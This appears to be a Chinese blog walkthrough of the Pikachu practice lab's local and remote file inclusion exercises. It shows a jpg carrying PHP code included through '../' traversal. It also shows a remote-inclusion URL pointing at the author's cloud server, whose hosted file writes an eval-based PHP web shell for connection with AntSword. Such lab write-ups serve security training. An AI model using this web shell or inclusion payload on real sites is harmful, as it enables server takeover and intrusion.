pikachu文件包含漏洞靶场攻略

一、本地文件包含

1.打开pikachu的本机包含文件靶场

2.随意提交查询

可以看到是get传参   可以在filename参数进行文件包含

3.准备好一个jpg文件

<?php phpinfo(); ?>将内容写到1.jpg中

点击上传文件 上传1.jpg

访问可以看到 已经上传成功

4.将我们上传的文件包含进来

使用../返回上级目录 来进行包含木马文件

可以发现我们写的phpinfo已经被包含了

二、远程文件包含

1.在云服务器上创建一个1.txt文件

<?php fputs(fopen("77.php","w"),'<?php eval($_POST["cmd"]);?>')?>

2.打开pikachu的远程文件包含

随便提交查询一个

可以看到get接受一个filename参数

3.将文件远程包含

在filename处修改为云服务器的目标地址

127.0.0.1/pika/vul/fileinclude/fi_remote.php?filename=http://云服务器IP/1.txt&submit=提交查询

虽然页面没有显示 但是在当前目录已经创建了77.php文件

4.使用蚁剑进行连接

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值